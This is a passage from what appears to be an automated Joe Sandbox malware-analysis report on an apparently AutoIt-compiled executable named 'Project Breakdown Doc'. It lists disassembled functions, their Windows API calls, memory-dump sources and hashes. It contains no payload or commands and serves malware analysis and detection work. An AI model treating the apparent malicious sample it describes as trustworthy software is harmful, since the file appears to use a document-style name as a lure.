                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C98673
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C98682
                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C98689
                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9869F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 4eccd75d61853a7f0815c380c7d1a9d2b5969f428ccca819a684ebe7dcb2d0ba
                                                  • Instruction ID: 0c70a0c8f085248f547ee793ec05f3702e7f2594bf0bdf81b02391b5214d08f8
                                                  • Opcode Fuzzy Hash: 4eccd75d61853a7f0815c380c7d1a9d2b5969f428ccca819a684ebe7dcb2d0ba
                                                  • Instruction Fuzzy Hash: 82F04F71240204AFEB111FA5EC8CF6F3FBDFF8A754B14002AF955C7150CA65D946DA60
                                                  Function 00C9C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C9C6BA
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C9C6D1
                                                  • MessageBeep.USER32(00000000), ref: 00C9C6E9
                                                  • KillTimer.USER32(?,0000040A), ref: 00C9C705
                                                  • EndDialog.USER32(?,00000001), ref: 00C9C71F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 949bcf172a71fc1433bf19797d2dfabec2b87d387f701ae3c44c197cd4651872
                                                  • Instruction ID: 3bc0a8b9f690200c11166f79213d76f9f605184a98c523c0455f45d3dca7bc3f
                                                  • Opcode Fuzzy Hash: 949bcf172a71fc1433bf19797d2dfabec2b87d387f701ae3c44c197cd4651872
                                                  • Instruction Fuzzy Hash: 17018130500704ABEF219B60DD8EFAA77B9FF00705F00066DF592A14E1DBF0AA5A8F80
                                                  Function 00C413B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00C413BF
                                                  • StrokeAndFillPath.GDI32(?,?,00C7BAD8,00000000,?), ref: 00C413DB
                                                  • SelectObject.GDI32(?,00000000), ref: 00C413EE
                                                  • DeleteObject.GDI32 ref: 00C41401
                                                  • StrokePath.GDI32(?), ref: 00C4141C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: 109bbbaec825f644e06d07e38cbbd593ad46a2bbc040860a668e1d6e0e72c3fb
                                                  • Instruction ID: 20dd2366e5f55f9b0b1b67ebbc0319a12fda395524b190d71eb183d9253bf452
                                                  • Opcode Fuzzy Hash: 109bbbaec825f644e06d07e38cbbd593ad46a2bbc040860a668e1d6e0e72c3fb
                                                  • Instruction Fuzzy Hash: F1F0EC30004308EBDB115F66EC0CB583FA5B701726F48C228F9AD855F1C73189A6DF61
                                                  Function 00CAC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00CAC69D
                                                  • CoCreateInstance.OLE32(00CD2D6C,00000000,00000001,00CD2BDC,?), ref: 00CAC6B5
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                  • CoUninitialize.OLE32 ref: 00CAC922
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: 3f98ac7316f61aa1a9cb34cb563a789e9e201f70fbe302f97d3886597698ee49
                                                  • Instruction ID: afe49f023e562cd9bdb042b0b717bdd56183cec817e525aa567c9a4fab534c1c
                                                  • Opcode Fuzzy Hash: 3f98ac7316f61aa1a9cb34cb563a789e9e201f70fbe302f97d3886597698ee49
                                                  • Instruction Fuzzy Hash: 0CA13C71108215AFD700EF64C881EAFB7E8FF99304F00492DF196972A2DB70EA49DB52
                                                  Function 00C52E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C60FF6: std::exception::exception.LIBCMT ref: 00C6102C
                                                    • Part of subcall function 00C60FF6: __CxxThrowException@8.LIBCMT ref: 00C61041
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C47BB1: _memmove.LIBCMT ref: 00C47C0B
                                                  • __swprintf.LIBCMT ref: 00C5302D
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C52EC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: f978c06314239afa9241c1490d0f5c4f56e2d6784ac11fd91a0db8758684800e
                                                  • Instruction ID: 92a1fe495220136d869e61f79f113a287daba77597d3656078bcad76f6584e58
                                                  • Opcode Fuzzy Hash: f978c06314239afa9241c1490d0f5c4f56e2d6784ac11fd91a0db8758684800e
                                                  • Instruction Fuzzy Hash: 839189351083419FCB28EF64D885D6EB7A4FF95740F04091EF9929B2A1DB30EE48EB56
                                                  Function 00CABBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C448A1,?,?,00C437C0,?), ref: 00C448CE
                                                  • CoInitialize.OLE32(00000000), ref: 00CABC26
                                                  • CoCreateInstance.OLE32(00CD2D6C,00000000,00000001,00CD2BDC,?), ref: 00CABC3F
                                                  • CoUninitialize.OLE32 ref: 00CABC5C
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                  • String ID: .lnk
                                                  • API String ID: 2126378814-24824748
                                                  • Opcode ID: 3f97814d3a16cd2fe4a67e0d8be8cbabacaa72946dfec8cfaa15fad31909d28f
                                                  • Instruction ID: a0fa7231e2ae52a613fb973dcbe11085bb454db4763aa3316551006d6e55b5f7
                                                  • Opcode Fuzzy Hash: 3f97814d3a16cd2fe4a67e0d8be8cbabacaa72946dfec8cfaa15fad31909d28f
                                                  • Instruction Fuzzy Hash: 16A136756043169FCB10DF14C484E6ABBE5FF89318F148998F8999B3A2CB31ED45CB91
                                                  Function 00C6524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00C652DD
                                                    • Part of subcall function 00C70340: __87except.LIBCMT ref: 00C7037B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: 48fb47d998b51be59c76506470ee5d6ba6187c231f1bbb927e605b34429bba75
                                                  • Instruction ID: a4261a16e2eafda98abf5619d0fc6c72fd8ce4f4d3191678f9149a7bc10002e1
                                                  • Opcode Fuzzy Hash: 48fb47d998b51be59c76506470ee5d6ba6187c231f1bbb927e605b34429bba75
                                                  • Instruction Fuzzy Hash: 9C517861A1DA01C7CB20B725C99137E6B949B40750F30CD6AE1ED862F6EF748EC4EB46
                                                  Function 00C6023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #$+
                                                  • API String ID: 0-2552117581
                                                  • Opcode ID: c4896efa98084ed92b7d3ef37a69912ebf93181fd8d128ac883b3081a988a293
                                                  • Instruction ID: b96f7bbf00a8724ff043becae27c8998574dd2993bf6ebcf5e1d28777702420f
                                                  • Opcode Fuzzy Hash: c4896efa98084ed92b7d3ef37a69912ebf93181fd8d128ac883b3081a988a293
                                                  • Instruction Fuzzy Hash: 325113765046469FDF26DF28C488AFE7BA4FF15310F244065ECA1AB2A0D7349E46C760
                                                  Function 00C562F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: 4aa2dff11e707e05a7cd57561e2e1f5650fa48cb486eb577b233269765a4cdea
                                                  • Instruction ID: f1fbaa21ac25df76900e8a4c633de1be8cda45739ec2aa7d1a4cd4b2110fcb99
                                                  • Opcode Fuzzy Hash: 4aa2dff11e707e05a7cd57561e2e1f5650fa48cb486eb577b233269765a4cdea
                                                  • Instruction Fuzzy Hash: 7F51D1759003099FCB24CF65C8857AABBF4EF04315F24856EEA5ACB251E771DA88CB44
                                                  Function 00CC7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CCF910,00000000,?,?,?,?), ref: 00CC7C4E
                                                  • GetWindowLongW.USER32 ref: 00CC7C6B
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CC7C7B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 075fb0b43ff43a007ee6b887b0d3846563bd03e7fd1f46d847bf8911248a1481
                                                  • Instruction ID: b44432487bd5d231d2362576b4dbf888cce69cdd201e7f1b667a85330f80ac09
                                                  • Opcode Fuzzy Hash: 075fb0b43ff43a007ee6b887b0d3846563bd03e7fd1f46d847bf8911248a1481
                                                  • Instruction Fuzzy Hash: 3D319E31604206ABDB118F38CC45FEA7BA9FB45324F244729F975D22E0D731ED519B60
                                                  Function 00CC7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CC76D0
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CC76E4
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CC7708
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: e326b342666797789dd439feb121c1591de3e0efaa40173101f510ae80e4bc75
                                                  • Instruction ID: a4adfd0dbcbe53c5d9dba62b6c83ce7858f1d3e0a224adbf01528053c39608d4
                                                  • Opcode Fuzzy Hash: e326b342666797789dd439feb121c1591de3e0efaa40173101f510ae80e4bc75
                                                  • Instruction Fuzzy Hash: B321A132500219BBDF16CFA4CC46FEA3B79EF48714F110258FE25AB1D0DAB5AC519BA0
                                                  Function 00CC6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CC6FAA
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CC6FBA
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CC6FDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: 97e3c7cb0efef323730ab034580ef36634d8595ca9de83db1d1a877f19d97fdc
                                                  • Instruction ID: a9e9c7d1d08e4055aff3074114f97b6c219ff489193e678f91c2c8b8865efa23
                                                  • Opcode Fuzzy Hash: 97e3c7cb0efef323730ab034580ef36634d8595ca9de83db1d1a877f19d97fdc
                                                  • Instruction Fuzzy Hash: 0B219232610118BFDF118F94DC85FBB37AAEF89754F01812CFA549B190C671AC529BA0
                                                  Function 00CC797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CC79E1
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CC79F6
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CC7A03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: 081cbccec53cd1be6850f2fbc1f1ea58d2840f9efb0ea1bff78417049cfabd0f
                                                  • Instruction ID: ffb0cbb5d8fe3aafe1c704a61d06bd5e6cd95b3c02f14d81bd78f0862447bf3b
                                                  • Opcode Fuzzy Hash: 081cbccec53cd1be6850f2fbc1f1ea58d2840f9efb0ea1bff78417049cfabd0f
                                                  • Instruction Fuzzy Hash: AC11E372244208BBEF149F61CC05FEB77A9EF89B64F01062DFA51A6090D271D851DB60
                                                  Function 00C44C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C44C2E), ref: 00C44CA3
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C44CB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: f01ce3fb8d38523c9fc70b3283c685d34c7b3a79ac42f34d5d6c3dfbf4c137f8
                                                  • Instruction ID: 13261ec24143dff710cbfee9377dd65342508468c77a7255ccf0287297bc0a29
                                                  • Opcode Fuzzy Hash: f01ce3fb8d38523c9fc70b3283c685d34c7b3a79ac42f34d5d6c3dfbf4c137f8
                                                  • Instruction Fuzzy Hash: C4D01271610723CFD7205F31D958B0A76D6AF05751B29C83DD896D6150D770D881C650
                                                  Function 00C44D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C44CE1,?), ref: 00C44DA2
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C44DB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 15ea6d681b2aa8be866a2ae432a831c966f67738b17095d0e371a066f45ee0cf
                                                  • Instruction ID: a470ea8173167b44451cf9e2b0d3292e69fcf0e69e0a8a21ffc81fba1e3193cc
                                                  • Opcode Fuzzy Hash: 15ea6d681b2aa8be866a2ae432a831c966f67738b17095d0e371a066f45ee0cf
                                                  • Instruction Fuzzy Hash: 91D01731950713CFD7209F31D808B4ABAE5AF05355B25C83ED8D6D6150EB70D880CA50
                                                  Function 00C44D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00C44D2E,?,00C44F4F,?,00D062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C44D6F
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C44D81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
